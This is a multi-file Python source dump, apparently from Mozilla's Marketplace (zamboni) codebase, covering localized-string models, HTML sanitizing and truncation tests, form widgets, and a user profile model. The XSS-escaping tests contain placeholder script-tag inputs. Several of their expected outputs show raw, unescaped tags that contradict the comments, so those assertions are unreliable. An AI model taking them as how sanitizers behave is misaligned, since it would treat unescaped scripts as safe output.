        s = u'<a href="http://example.com">bar</a>'
        x = LinkifiedTranslation(localized_string=s)
        eq_(x.__html__(),
            u'<a rel="nofollow" href="http://external.url">bar</a>')

    def test_forbidden_tags(self):
        # Even <b> is escaped here, unlike PurifiedTranslation.
        s = u'<script>some naughty xss</script> <b>bold</b>'
        x = LinkifiedTranslation(localized_string=s)
        eq_(x.__html__(),
            '<script>some naughty xss</script> '
            '<b>bold</b>')
class NoLinksTranslationTest(TestCase):
    """NoLinksTranslation keeps safe markup but strips links entirely."""

    def test_allowed_tags(self):
        s = u'<b>bold text</b> or <code>code</code>'
        x = NoLinksTranslation(localized_string=s)
        eq_(x.__html__(), u'<b>bold text</b> or <code>code</code>')

    def test_forbidden_tags(self):
        s = u'<script>some naughty xss</script>'
        x = NoLinksTranslation(localized_string=s)
        eq_(x.__html__(), '<script>some naughty xss</script>')

    def test_links_stripped(self):
        # Link with markup.
        s = u'a <a href="http://example.com">link</a> with markup'
        x = NoLinksTranslation(localized_string=s)
        eq_(x.__html__(), u'a  with markup')

        # Text link.
        s = u'a text http://example.com link'
        x = NoLinksTranslation(localized_string=s)
        eq_(x.__html__(), u'a text  link')

        # Text link, markup link, allowed tags, forbidden tags and bad markup.
        s = (u'a <a href="http://example.com">link</a> with markup, a text '
             u'http://example.com link, <b>with allowed tags</b>, '
             u'<script>forbidden tags</script> and <http://bad.markup.com')
        x = NoLinksTranslation(localized_string=s)
        eq_(x.__html__(), u'a  with markup, a text  link, '
                          u'<b>with allowed tags</b>, '
                          u'<script>forbidden tags</script> and')
class NoLinksNoMarkupTranslationTest(TestCase):
    """NoLinksNoMarkupTranslation strips links AND escapes all markup."""

    def test_forbidden_tags(self):
        s = u'<script>some naughty xss</script> <b>bold</b>'
        x = NoLinksNoMarkupTranslation(localized_string=s)
        eq_(x.__html__(),
            '<script>some naughty xss</script> '
            '<b>bold</b>')

    def test_links_stripped(self):
        # Link with markup.
        s = u'a <a href="http://example.com">link</a> with markup'
        x = NoLinksNoMarkupTranslation(localized_string=s)
        eq_(x.__html__(), u'a  with markup')

        # Text link.
        s = u'a text http://example.com link'
        x = NoLinksNoMarkupTranslation(localized_string=s)
        eq_(x.__html__(), u'a text  link')

        # Text link, markup link, forbidden tags and bad markup.
        s = (u'a <a href="http://example.com">link</a> with markup, a text '
             u'http://example.com link, <b>with forbidden tags</b>, '
             u'<script>forbidden tags</script> and <http://bad.markup.com')
        x = NoLinksNoMarkupTranslation(localized_string=s)
        eq_(x.__html__(), u'a  with markup, a text  link, '
                          u'<b>with forbidden tags</b>, '
                          u'<script>forbidden tags</script> and')
def test_translation_bool():
    """A Translation is truthy only for a non-empty, non-whitespace string."""
    def make(s):
        return Translation(localized_string=s)

    assert bool(make('text')) is True
    assert bool(make(' ')) is False
    assert bool(make('')) is False
    assert bool(make(None)) is False
def test_translation_unicode():
    """unicode() of a Translation yields its string, or '' for None."""
    def make(s):
        return Translation(localized_string=s)

    eq_(unicode(make('hello')), 'hello')
    eq_(unicode(make(None)), '')
def test_widget_value_from_datadict():
    # TransMulti gathers {name}_{locale} form inputs into a locale dict;
    # the _delete suffix maps that locale to None.
    data = {'f_en-US': 'woo', 'f_de': 'herr', 'f_fr_delete': ''}
    actual = widgets.TransMulti().value_from_datadict(data, [], 'f')
    expected = {'en-US': 'woo', 'de': 'herr', 'fr': None}
    eq_(actual, expected)
def test_comparison_with_lazy():
    # Only checks that comparing a Translation with a lazy unicode proxy
    # does not raise; the comparison results are deliberately discarded.
    x = Translation(localized_string='xxx')
    lazy_u = lazy(lambda x: x, unicode)
    x == lazy_u('xxx')
    lazy_u('xxx') == x
def test_cache_key():
    # Test that we are not taking the db into account when building our
    # cache keys for django-cache-machine. See bug 928881.
    eq_(Translation._cache_key(1, 'default'),
        Translation._cache_key(1, 'slave'))

    # Test that we are using the same cache no matter what Translation class
    # we use.
    eq_(PurifiedTranslation._cache_key(1, 'default'),
        Translation._cache_key(1, 'default'))
    eq_(LinkifiedTranslation._cache_key(1, 'default'),
        Translation._cache_key(1, 'default'))
########NEW FILE########
__FILENAME__ = test_util
from nose.tools import eq_
from translations.models import Translation
from translations.utils import transfield_changed, truncate, truncate_text
def test_truncate_text():
    # truncate_text returns (text, chars_remaining_under_limit); note that
    # a string exactly at the limit still gets the '...' suffix.
    eq_(truncate_text('foobar', 5), ('...', 0))
    eq_(truncate_text('foobar', 5, True), ('fooba...', 0))
    eq_(truncate_text('foobar', 5, True, 'xxx'), ('foobaxxx', 0))
    eq_(truncate_text('foobar', 6), ('foobar...', 0))
    eq_(truncate_text('foobar', 7), ('foobar', 1))
def test_truncate():
    # truncate counts only text content, not markup, and keeps the tags
    # around whatever text survives.
    s = ' <p>one</p><ol><li>two</li><li> three</li> </ol> four <p>five</p>'
    eq_(truncate(s, 100), s)
    eq_(truncate(s, 6), '<p>one</p><ol><li>two...</li></ol>')
    eq_(truncate(s, 5, True), '<p>one</p><ol><li>tw...</li></ol>')
    eq_(truncate(s, 11), '<p>one</p><ol><li>two</li><li>three...</li></ol>')
    eq_(truncate(s, 15),
        '<p>one</p><ol><li>two</li><li>three</li></ol>four...')
    eq_(truncate(s, 13, True, 'xxx'),
        '<p>one</p><ol><li>two</li><li>three</li></ol>foxxx')
def test_transfield_changed():
    # transfield_changed returns truthy when the cleaned form data differs
    # from the initial translations for the given field.
    initial = {
        'some_field': 'some_val',
        'name_en-us': Translation.objects.create(
            id=500, locale='en-us', localized_string='test_name')
    }
    data = {'some_field': 'some_val',
            'name': {'init': '', 'en-us': 'test_name'}}

    # No change.
    eq_(transfield_changed('name', initial, data), 0)

    # Changed localization.
    data['name']['en-us'] = 'test_name_changed'
    eq_(transfield_changed('name', initial, data), 1)

    # New localization.
    data['name']['en-us'] = 'test_name'
    data['name']['en-af'] = Translation.objects.create(
        id=505, locale='en-af', localized_string='test_name_localized')
    eq_(transfield_changed('name', initial, data), 1)

    # Deleted localization.
    del initial['name_en-us']
    eq_(transfield_changed('name', initial, data), 1)
########NEW FILE########
__FILENAME__ = test_widgets
from pyquery import PyQuery as pq
from nose.tools import eq_
import amo.tests
from translations import models, widgets
class TestWidget(amo.tests.TestCase):
    """Rendering behaviour of the translation form widgets."""

    def test_avoid_purified_translation(self):
        # Even if we pass in a LinkifiedTranslation the widget switches to a
        # normal Translation before rendering.
        w = widgets.TransTextarea.widget()
        link = models.LinkifiedTranslation(localized_string='<b>yum yum</b>',
                                           locale='fr', id=10)
        link.clean()
        widget = w.render('name', link)
        eq_(pq(widget).html().strip(), '<b>yum yum</b>')

    def test_default_locale(self):
        # Without a default_locale the empty widget uses the active locale.
        w = widgets.TransTextarea()
        result = w.render('name', '')
        eq_(pq(result)('textarea:not([lang=init])').attr('lang'), 'en-us')

        w.default_locale = 'pl'
        result = w.render('name', '')
        eq_(pq(result)('textarea:not([lang=init])').attr('lang'), 'pl')
########NEW FILE########
__FILENAME__ = transformer
from django.conf import settings
from django.db import connections, models, router
from django.utils import translation
from translations.models import Translation
from translations.fields import TranslatedField
isnull = """IF(!ISNULL({t1}.localized_string), {t1}.{col}, {t2}.{col})
AS {name}_{col}"""
join = """LEFT OUTER JOIN translations {t}
ON ({t}.id={model}.{name} AND {t}.locale={locale})"""
no_locale_join = """LEFT OUTER JOIN translations {t}
ON {t}.id={model}.{name}"""
trans_fields = [f.name for f in Translation._meta.fields]
def build_query(model, connection):
    """Build the raw SQL (and its params) that fetches every translated
    field of ``model`` in the active locale, with a per-field fallback.

    Returns (sql, params); the sql still contains an ``{ids}`` placeholder
    to be filled in by the caller (see get_trans).
    """
    qn = connection.ops.quote_name
    selects, joins, params = [], [], []

    # The model can define a fallback locale (which may be a Field).
    if hasattr(model, 'get_fallback'):
        fallback = model.get_fallback()
    else:
        fallback = settings.LANGUAGE_CODE

    if not hasattr(model._meta, 'translated_fields'):
        # Cache the translated-field list on _meta; computed once per model.
        model._meta.translated_fields = [f for f in model._meta.fields
                                         if isinstance(f, TranslatedField)]

    # Add the selects and joins for each translated field on the model.
    for field in model._meta.translated_fields:
        if isinstance(fallback, models.Field):
            # Field fallback: reference the column directly in SQL.
            fallback_str = '%s.%s' % (qn(model._meta.db_table),
                                      qn(fallback.column))
        else:
            # String fallback: bind it as a query parameter.
            fallback_str = '%s'
        name = field.column
        d = {'t1': 't1_' + name, 't2': 't2_' + name,
             'model': qn(model._meta.db_table), 'name': name}

        selects.extend(isnull.format(col=f, **d) for f in trans_fields)

        joins.append(join.format(t=d['t1'], locale='%s', **d))
        params.append(translation.get_language())

        if field.require_locale:
            joins.append(join.format(t=d['t2'], locale=fallback_str, **d))
            if not isinstance(fallback, models.Field):
                params.append(fallback)
        else:
            joins.append(no_locale_join.format(t=d['t2'], **d))

    # ids will be added later on.
    sql = """SELECT {model}.{pk}, {selects} FROM {model} {joins}
             WHERE {model}.{pk} IN {{ids}}"""
    s = sql.format(selects=','.join(selects), joins='\n'.join(joins),
                   model=qn(model._meta.db_table), pk=model._meta.pk.column)
    return s, params
def get_trans(items):
    """Fetch and attach Translation objects for all translated fields of
    ``items`` (model instances of the same class) in one raw query."""
    if not items:
        return

    model = items[0].__class__
    # FIXME: if we knew which db the queryset we are transforming used, we
    # could make sure we are re-using the same one.
    dbname = router.db_for_read(model)
    connection = connections[dbname]
    sql, params = build_query(model, connection)
    item_dict = dict((item.pk, item) for item in items)
    ids = ','.join(map(str, item_dict.keys()))

    cursor = connection.cursor()
    cursor.execute(sql.format(ids='(%s)' % ids), tuple(params))
    step = len(trans_fields)
    for row in cursor.fetchall():
        # We put the item's pk as the first selected field.
        item = item_dict[row[0]]
        for index, field in enumerate(model._meta.translated_fields):
            # Each translated field contributes ``step`` consecutive columns.
            start = 1 + step * index
            t = Translation(*row[start:start+step])
            if t.id is not None and t.localized_string is not None:
                setattr(item, field.name, t)
########NEW FILE########
__FILENAME__ = utils
import copy
from django.utils.encoding import force_unicode
import html5lib
import jinja2
def truncate_text(text, limit, killwords=False, end='...'):
    """Return as many characters as possible without going over the limit.

    Returns a ``(text, remaining)`` tuple, where ``remaining`` is how many
    characters were left under the limit (0 whenever truncation happened).
    """
    stripped = text.strip()
    remaining = limit - len(stripped)
    if remaining > 0:
        # Already short enough: return untouched (minus the whitespace).
        return stripped, remaining
    # Explicitly add "end" in any case, as Jinja can't know we're truncating
    # for real here, even though we might be at the end of a word.
    shortened = jinja2.filters.do_truncate(stripped, limit, killwords, end='')
    return shortened + end, 0
def trim(tree, limit, killwords, end):
    """Truncate the text of an html5lib tree to at most ``limit`` characters.

    Returns ``(tree, remaining)`` where ``remaining`` is how many characters
    were still available under the limit after trimming.
    """
    if tree.text:  # Root node's text.
        tree.text, limit = truncate_text(tree.text, limit, killwords, end)
    # Iterate over a copy: we remove children from ``tree`` inside the loop,
    # and mutating an element while iterating it skips the sibling right
    # after each removed child, leaving some over-limit children in place.
    for child in list(tree):  # Immediate children.
        if limit <= 0:
            # We reached the limit, remove all remaining children.
            tree.remove(child)
        else:
            # Recurse on the current child.
            _parsed_tree, limit = trim(child, limit, killwords, end)
    if tree.tail:  # Root node's tail text.
        if limit <= 0:
            tree.tail = ''
        else:
            tree.tail, limit = truncate_text(tree.tail, limit, killwords, end)
    return tree, limit
def text_length(tree):
    """Find the length of the text content of ``tree``, excluding markup."""
    total = 0
    # ``iter()`` replaces ``getiterator()``, which has been deprecated since
    # Python 2.7 (and removed in 3.9); both walk every node in the tree.
    for node in tree.iter():  # Traverse all the tree nodes.
        # In etree, a node has a text and tail attribute.
        # Eg: "<b>inner text</b> tail text <em>inner text</em>".
        if node.text:
            total += len(node.text.strip())
        if node.tail:
            total += len(node.tail.strip())
    return total
def truncate(html, length, killwords=False, end='...'):
    """
    Return a slice of ``html`` <= length chars.

    killwords and end are currently ignored.

    ONLY USE FOR KNOWN-SAFE HTML.
    """
    tree = html5lib.parseFragment(html)
    if text_length(tree) <= length:
        # Fits already: return the input unchanged (but markup-safe).
        return jinja2.Markup(html)
    else:
        # Get a truncated version of the tree.
        short, _ = trim(tree, length, killwords, end)

        # Serialize the parsed tree back to html.
        walker = html5lib.treewalkers.getTreeWalker('etree')
        stream = walker(short)
        # NOTE(review): ``html5lib.serializer.htmlserializer`` is the old
        # (pre-1.0) html5lib module layout -- confirm the pinned version.
        serializer = html5lib.serializer.htmlserializer.HTMLSerializer(
            quote_attr_values=True, omit_optional_tags=False)
        return jinja2.Markup(force_unicode(serializer.render(stream)))
def transfield_changed(field, initial, data):
    """
    For forms, compares initial data against cleaned_data for TransFields.

    Returns True if the data changed, False if it is unchanged (the original
    docstring had this backwards; the name and the tests agree with this).

    Arguments:
    field -- name of the form field as-is.
    initial -- data in the form of {'description_en-us': 'x',
                                    'description_en-br': 'y'}
    data -- cleaned data in the form of {'description': {'init': '',
                                                         'en-us': 'x',
                                                         'en-br': 'y'}
    """
    # ``is not None`` instead of ``!= None``: identity test is the PEP 8
    # idiom and avoids dispatching through a rich-comparison method.
    initial = [(k, v.localized_string) for k, v in initial.iteritems()
               if '%s_' % field in k and v is not None]
    data = [('%s_%s' % (field, k), v) for k, v in data[field].iteritems()
            if k != 'init']
    return set(initial) != set(data)
########NEW FILE########
__FILENAME__ = widgets
from django import forms
from django.utils import translation
from django.utils.encoding import force_text
from django.utils.translation.trans_real import to_language
from .models import Translation
def get_string(x):
    """Return the localized string for translation id ``x`` in the active
    locale, or u'' if that locale has no string."""
    locale = translation.get_language()
    try:
        return (Translation.objects.filter(id=x, locale=locale)
                .filter(localized_string__isnull=False)
                .values_list('localized_string', flat=True)[0])
    except IndexError:
        return u''
class TranslationTextInput(forms.widgets.TextInput):
    """A simple textfield replacement for collecting translated names."""

    def _format_value(self, value):
        # A long here is a foreign key into the translations table; resolve
        # it to the localized string for display.
        if isinstance(value, long):
            return get_string(value)
        return value
class TranslationTextarea(forms.widgets.Textarea):
    """Textarea that resolves a translation id to its localized string."""

    def render(self, name, value, attrs=None):
        # A long value is a translation FK; swap in the actual string.
        if isinstance(value, long):
            value = get_string(value)
        return super(TranslationTextarea, self).render(name, value, attrs)

    def _has_changed(self, initial, data):
        # Compare as text so e.g. None vs. u'' are handled consistently.
        return not ((initial is None and data is None) or
                    (force_text(initial) == force_text(data)))
class TransMulti(forms.widgets.MultiWidget):
    """
    Builds the inputs for a translatable field.

    The backend dumps all the available translations into a set of widgets
    wrapped in div.trans and javascript handles the rest of the UI.
    """
    choices = None  # Django expects widgets to have a choices attribute.

    def __init__(self, attrs=None):
        # We set up the widgets in render since every Translation needs a
        # different number of widgets.
        super(TransMulti, self).__init__(widgets=[], attrs=attrs)

    def render(self, name, value, attrs=None):
        self.name = name
        value = self.decompress(value)
        if value:
            # One sub-widget per existing translation.
            self.widgets = [self.widget() for _ in value]
        else:
            # Give an empty widget in the default locale.
            default_locale = getattr(self, 'default_locale',
                                     translation.get_language())
            self.widgets = [self.widget()]
            value = [Translation(locale=default_locale)]
        return super(TransMulti, self).render(name, value, attrs)

    def decompress(self, value):
        # NOTE(review): falls through (implicitly returns None) for any
        # other value type, e.g. a Translation instance -- confirm intended.
        if not value:
            return []
        elif isinstance(value, (long, int)):
            # We got a foreign key to the translation table.
            qs = Translation.objects.filter(id=value)
            return list(qs.filter(localized_string__isnull=False))
        elif isinstance(value, dict):
            # We're getting a datadict, there was a validation error.
            return [Translation(locale=k, localized_string=v)
                    for k, v in value.items()]

    def value_from_datadict(self, data, files, name):
        # All the translations for this field are called {name}_{locale}, so
        # pull out everything that starts with name.
        rv = {}
        prefix = '%s_' % name
        locale = lambda s: s[len(prefix):]
        delete_locale = lambda s: s[len(prefix):-len('_delete')]
        # Look for the name without a locale suffix.
        if name in data:
            rv[translation.get_language()] = data[name]
        # Now look for {name}_{locale}.  A trailing _delete marker maps the
        # locale to None (i.e. "remove this translation").
        for key in data:
            if key.startswith(prefix):
                if key.endswith('_delete'):
                    rv[delete_locale(key)] = None
                else:
                    rv[locale(key)] = data[key]
        return rv

    def format_output(self, widgets):
        # Wrap the rendered sub-widgets, plus a hidden 'init' template
        # widget the javascript clones for new locales, in a findable div.
        s = super(TransMulti, self).format_output(widgets)
        init = self.widget().render(self.name + '_',
                                    Translation(locale='init'),
                                    {'class': 'trans-init'})
        return '<div id="trans-%s" class="trans" data-name="%s">%s%s</div>' % (
            self.name, self.name, s, init)
class _TransWidget(object):
    """
    Widget mixin that adds a Translation locale to the lang attribute and the
    input name.
    """

    def render(self, name, value, attrs=None):
        # Imported here to avoid a circular import with .fields.
        from .fields import switch
        attrs = self.build_attrs(attrs)
        lang = to_language(value.locale)
        attrs.update(lang=lang)
        # Use rsplit to drop django's name_idx numbering.  (name_0 => name)
        name = '%s_%s' % (name.rsplit('_', 1)[0], lang)
        # Make sure we don't get a Linkified/Purified Translation.  We don't
        # want people editing a bleached value.
        if value.__class__ != Translation:
            value = switch(value, Translation)
        return super(_TransWidget, self).render(name, value, attrs)
# TransInput and TransTextarea are MultiWidgets that know how to set up our
# special translation attributes.
class TransInput(TransMulti):
    # One single-line text input per locale.
    widget = type('_TextInput', (_TransWidget, forms.widgets.TextInput), {})


class TransTextarea(TransMulti):
    # One multi-line textarea per locale.
    widget = type('_Textarea', (_TransWidget, forms.widgets.Textarea), {})
########NEW FILE########
__FILENAME__ = cron
from django.db import connections
import commonware.log
import cronjobs
import multidb
from celery.task.sets import TaskSet
from amo import VALID_STATUSES
from amo.utils import chunked
from .tasks import update_user_ratings_task
task_log = commonware.log.getLogger('z.task')
@cronjobs.register
def update_user_ratings():
    """Update add-on author's ratings."""

    cursor = connections[multidb.get_slave()].cursor()
    # We build this query ahead of time because the cursor complains about
    # data truncation if it does the parameters.  Also, this query is
    # surprisingly quick, <1sec for 6100 rows returned
    q = """ SELECT
                addons_users.user_id as user_id,
                AVG(rating) as avg_rating
            FROM reviews
                INNER JOIN versions
                INNER JOIN addons_users
                INNER JOIN addons
            ON reviews.version_id = versions.id
                AND addons.id = versions.addon_id
                AND addons_users.addon_id = addons.id
            WHERE reviews.reply_to IS NULL
                AND reviews.rating > 0
                AND addons.status IN (%s)
            GROUP BY addons_users.user_id
            """ % (",".join(map(str, VALID_STATUSES)))

    cursor.execute(q)
    d = cursor.fetchall()
    cursor.close()

    # Fan the rows out to celery tasks in chunks of 1000 users.
    ts = [update_user_ratings_task.subtask(args=[chunk])
          for chunk in chunked(d, 1000)]
    TaskSet(ts).apply_async()
########NEW FILE########
__FILENAME__ = helpers
import random
from django.utils.encoding import smart_unicode
import jinja2
from jingo import register
from tower import ugettext as _
@register.function
def emaillink(email, title=None, klass=None):
    """Render an email address obfuscated against scrapers: the fallback
    span holds the address reversed with junk injected; frontend JS undoes
    the mangling for real users."""
    if not email:
        return ""

    fallback = email[::-1]  # reverse
    # inject junk somewhere
    i = random.randint(0, len(email) - 1)
    fallback = u"%s%s%s" % (jinja2.escape(fallback[:i]),
                            u'<span class="i">null</span>',
                            jinja2.escape(fallback[i:]))
    # replace @ and .
    # NOTE(review): these replacements are no-ops as written -- they likely
    # were HTML entity replacements originally and the entities got decoded
    # somewhere along the way; confirm against upstream.
    fallback = fallback.replace('@', '@').replace('.', '.')

    if title:
        title = jinja2.escape(title)
    else:
        title = '<span class="emaillink">%s</span>' % fallback

    node = (u'<a%s href="#">%s</a><span class="emaillink js-hidden">%s</span>'
            % ((' class="%s"' % klass) if klass else '', title, fallback))
    return jinja2.Markup(node)
def _user_link(user):
    # Plain strings pass through untouched (assumed already rendered).
    if isinstance(user, basestring):
        return user
    # Marketplace doesn't have user profile pages.
    return jinja2.escape(smart_unicode(user.name))
@register.filter
def user_link(user):
    """Template filter: render a single user as markup-safe text."""
    if not user:
        return ''
    return jinja2.Markup(_user_link(user))
@register.function
def users_list(users, size=None):
    """Render a comma-separated list of users, capped at ``size`` entries
    with an 'others' suffix when truncated."""
    if not users:
        return ''
    tail = []
    if size and size < len(users):
        users = users[:size]
        tail = [_('others', 'user_list_others')]
    # NOTE(review): ``map(...) + tail`` relies on Python 2's list-returning
    # map(); under Python 3 this would raise TypeError.
    return jinja2.Markup(', '.join(map(_user_link, users) + tail))
@register.function
def user_data(amo_user):
    """Return a small dict describing ``amo_user`` for templates/JS.

    Keys: 'anonymous' (bool), 'currency' (always 'USD' here) and 'email'
    ('' for anonymous users).  Accepts anything; objects without an
    ``is_anonymous`` attribute are treated as anonymous.
    """
    # Dropped the unused ``pre_auth`` local that was assigned but never
    # read or returned.
    anonymous, currency, email = True, 'USD', ''
    if hasattr(amo_user, 'is_anonymous'):
        anonymous = amo_user.is_anonymous()
    if not anonymous:
        email = amo_user.email
    return {'anonymous': anonymous, 'currency': currency, 'email': email}
########NEW FILE########
__FILENAME__ = models
import re
import time
from contextlib import contextmanager
from datetime import datetime
from django import forms
from django.conf import settings
from django.contrib.auth.models import AbstractBaseUser
from django.core import validators
from django.db import models
from django.utils import translation
from django.utils.encoding import smart_unicode
from django.utils.functional import lazy
import commonware.log
import tower
from cache_nuggets.lib import memoize
from tower import ugettext as _
import amo
import amo.models
from amo.urlresolvers import reverse
from translations.fields import NoLinksField, save_signal
from translations.query import order_by_translation
log = commonware.log.getLogger('z.users')
class UserForeignKey(models.ForeignKey):
    """
    A replacement for models.ForeignKey('users.UserProfile').

    This field uses UserEmailField to make form fields key off the user's
    email instead of the primary key id.  We also hook up autocomplete
    automatically.
    """

    def __init__(self, *args, **kw):
        super(UserForeignKey, self).__init__(UserProfile, *args, **kw)

    def value_from_object(self, obj):
        # Present the related user's email instead of the pk.
        return getattr(obj, self.name).email

    def formfield(self, **kw):
        defaults = {'form_class': UserEmailField}
        defaults.update(kw)
        # Call Field.formfield directly to skip ForeignKey's ChoiceField
        # machinery and keep the email-based field.
        return models.Field.formfield(self, **defaults)
class UserEmailField(forms.EmailField):
    """EmailField that cleans to the matching UserProfile instance."""

    def clean(self, value):
        if value in validators.EMPTY_VALUES:
            raise forms.ValidationError(self.error_messages['required'])
        try:
            return UserProfile.objects.get(email=value)
        except UserProfile.DoesNotExist:
            raise forms.ValidationError(_('No user with that email.'))

    def widget_attrs(self, widget):
        # Defer reverse() until render time: the URLconf may not be loaded
        # when the form class is defined.
        lazy_reverse = lazy(reverse, str)
        return {'class': 'email-autocomplete',
                'data-src': lazy_reverse('users.ajax')}
# Widen AbstractBaseUser.password before UserProfile (below) inherits it.
# NOTE(review): presumably needed for legacy password hash formats stored in
# the old 'users' table -- confirm before removing.
AbstractBaseUser._meta.get_field('password').max_length = 255
class UserProfile(amo.models.OnChangeMixin, amo.models.ModelBase,
                  AbstractBaseUser):
    """Custom user model for accounts.

    Authentication is delegated to BrowserID/Persona (see ``get_backend``
    and ``check_password``); admin powers (``is_staff``/``is_superuser``)
    are derived from group rules rather than stored on the row.
    """
    USERNAME_FIELD = 'username'
    username = models.CharField(max_length=255, default='', unique=True)
    display_name = models.CharField(max_length=255, default='', null=True,
                                    blank=True)
    email = models.EmailField(unique=True, null=True)
    averagerating = models.CharField(max_length=255, blank=True, null=True)
    bio = NoLinksField(short=False)
    confirmationcode = models.CharField(max_length=255, default='',
                                        blank=True)
    # Soft-delete flag; see anonymize() which sets it.
    deleted = models.BooleanField(default=False)
    display_collections = models.BooleanField(default=False)
    display_collections_fav = models.BooleanField(default=False)
    emailhidden = models.BooleanField(default=True)
    homepage = models.URLField(max_length=255, blank=True, default='')
    location = models.CharField(max_length=255, blank=True, default='')
    notes = models.TextField(blank=True, null=True)
    notifycompat = models.BooleanField(default=True)
    notifyevents = models.BooleanField(default=True)
    occupation = models.CharField(max_length=255, default='', blank=True)
    # This is essentially a "has_picture" flag right now
    picture_type = models.CharField(max_length=75, default='', blank=True)
    resetcode = models.CharField(max_length=255, default='', blank=True)
    resetcode_expires = models.DateTimeField(default=datetime.now, null=True,
                                             blank=True)
    # When (if ever) the user accepted the developer agreement; filtered on
    # by users.views.ajax when dev=1.
    read_dev_agreement = models.DateTimeField(null=True, blank=True)
    last_login_ip = models.CharField(default='', max_length=45, editable=False)
    last_login_attempt = models.DateTimeField(null=True, editable=False)
    last_login_attempt_ip = models.CharField(default='', max_length=45,
                                             editable=False)
    failed_login_attempts = models.PositiveIntegerField(default=0,
                                                        editable=False)
    source = models.PositiveIntegerField(default=amo.LOGIN_SOURCE_UNKNOWN,
                                         editable=False, db_index=True)
    # False when the account was created from an unverified Persona
    # assertion; see users.views.browserid_authenticate.
    is_verified = models.BooleanField(default=True)
    region = models.CharField(max_length=11, null=True, blank=True,
                              editable=False)
    lang = models.CharField(max_length=5, null=True, blank=True,
                            editable=False)
    class Meta:
        db_table = 'users'
    def __init__(self, *args, **kw):
        super(UserProfile, self).__init__(*args, **kw)
        # Normalize usernames loaded from the DB to unicode.
        if self.username:
            self.username = smart_unicode(self.username)
    def __unicode__(self):
        return u'%s: %s' % (self.id, self.display_name or self.username)
    def save(self, force_insert=False, force_update=False, using=None, **kwargs):
        # we have to fix stupid things that we defined poorly in remora
        if not self.resetcode_expires:
            self.resetcode_expires = datetime.now()
        super(UserProfile, self).save(force_insert, force_update, using,
                                      **kwargs)
    @property
    def is_superuser(self):
        # Membership in any group whose rules are the '*:*' wildcard grants
        # superuser powers.
        return self.groups.filter(rules='*:*').exists()
    @property
    def is_staff(self):
        # Staff == allowed the 'Admin' action per the ACL, not a DB flag.
        from access import acl
        return acl.action_allowed_user(self, 'Admin', '%')
    def has_perm(self, perm, obj=None):
        return self.is_superuser
    def has_module_perms(self, app_label):
        return self.is_superuser
    def get_backend(self):
        # Authentication always goes through BrowserID; the backend value
        # is effectively read-only (set_backend is a no-op).
        return 'django_browserid.auth.BrowserIDBackend'
    def set_backend(self, val):
        pass
    backend = property(get_backend, set_backend)
    def is_anonymous(self):
        return False
    def get_url_path(self, src=None):
        # See: bug 880767.
        return '#'
    def my_apps(self, n=8):
        """Returns n apps"""
        qs = self.addons.filter(type=amo.ADDON_WEBAPP)
        qs = order_by_translation(qs, 'name')
        return qs[:n]
    @property
    def picture_url(self):
        """URL of the user's picture, or the anonymous placeholder."""
        if not self.picture_type:
            return settings.MEDIA_URL + '/img/zamboni/anon_user.png'
        else:
            # Shard the storage path on the id's leading digits; the
            # mtime-based query string busts caches after an upload.
            split_id = re.match(r'((\d*?)(\d{0,3}?))\d{1,3}$', str(self.id))
            return settings.USERPICS_URL % (
                split_id.group(2) or 0, split_id.group(1) or 0, self.id,
                int(time.mktime(self.modified.timetuple())))
    @amo.cached_property
    def is_developer(self):
        return self.addonuser_set.exists()
    @property
    def name(self):
        return smart_unicode(self.display_name or self.username)
    @amo.cached_property
    def reviews(self):
        """All reviews that are not dev replies."""
        qs = self._reviews_all.filter(reply_to=None)
        # Force the query to occur immediately. Several
        # reviews-related tests hang if this isn't done.
        return qs
    def anonymize(self):
        """Scrub PII from the row and mark the account deleted."""
        log.info(u"User (%s: <%s>) is being anonymized." % (self, self.email))
        self.email = None
        self.password = "sha512$Anonymous$Password"
        self.username = "Anonymous-%s" % self.id  # Can't be null
        self.display_name = None
        self.homepage = ""
        self.deleted = True
        self.picture_type = ""
        self.save()
    def check_password(self, raw_password):
        # BrowserID does not store a password.
        return True
    def log_login_attempt(self, successful):
        """Log a user's login attempt"""
        self.last_login_attempt = datetime.now()
        self.last_login_attempt_ip = commonware.log.get_remote_addr()
        if successful:
            log.debug(u"User (%s) logged in successfully" % self)
            self.failed_login_attempts = 0
            self.last_login_ip = commonware.log.get_remote_addr()
        else:
            log.debug(u"User (%s) failed to log in" % self)
            # 16777216 == 2**24; cap looks sized for a MEDIUMINT-ish
            # column -- TODO confirm against the schema.
            if self.failed_login_attempts < 16777216:
                self.failed_login_attempts += 1
        self.save()
    def purchase_ids(self):
        """
        I'm special casing this because we use purchase_ids a lot in the site
        and we are not caching empty querysets in cache-machine.
        That means that when the site is first launched we are having a
        lot of empty queries hit.
        We can probably do this in smarter fashion by making cache-machine
        cache empty queries on an as need basis.
        """
        # Circular import
        from mkt.prices.models import AddonPurchase
        @memoize(prefix='users:purchase-ids')
        def ids(pk):
            return (AddonPurchase.objects.filter(user=pk)
                                 .values_list('addon_id', flat=True)
                                 .filter(type=amo.CONTRIB_PURCHASE)
                                 .order_by('pk'))
        return ids(self.pk)
    @contextmanager
    def activate_lang(self):
        """
        Activate the language for the user. If none is set will go to the site
        default which is en-US.
        """
        lang = self.lang if self.lang else settings.LANGUAGE_CODE
        old = translation.get_language()
        tower.activate(lang)
        yield
        tower.activate(old)
# Keep translated fields (e.g. bio) in sync when a profile is saved.
models.signals.pre_save.connect(save_signal, sender=UserProfile,
                                dispatch_uid='userprofile_translations')
class UserNotification(amo.models.ModelBase):
    """Per-user opt-in/out flag for one notification type.

    ``notification_id`` refers to the ids declared in
    ``users.notifications``; ``enabled`` records the user's choice.
    """
    user = models.ForeignKey(UserProfile, related_name='notifications')
    notification_id = models.IntegerField()
    enabled = models.BooleanField(default=False)

    class Meta:
        db_table = 'users_notifications'

    @staticmethod
    def update_or_create(update=None, **kwargs):
        """Update rows matching ``kwargs`` with ``update`` or create one.

        ``update`` previously defaulted to a shared mutable ``{}`` which
        was mutated below, leaking lookup kwargs into later calls; we now
        default to ``None`` and copy, which also leaves a caller-supplied
        dict untouched.
        """
        update = dict(update) if update else {}
        rows = UserNotification.objects.filter(**kwargs).update(**update)
        if not rows:
            # Nothing matched: create a row carrying both the lookup
            # values and the requested field updates.
            update.update(kwargs)
            UserNotification.objects.create(**update)
########NEW FILE########
__FILENAME__ = notifications
from inspect import isclass
from celery.datastructures import AttributeDict
from tower import ugettext_lazy as _
class _NOTIFICATION(object):
    """Base marker for notification types.

    Subclasses declare:
      id              -- stable integer stored in UserNotification rows
      group           -- 'user' or 'dev' (see NOTIFICATION_GROUPS)
      short           -- slug used programmatically
      label           -- localized description shown to the user
      mandatory       -- True if the user cannot opt out
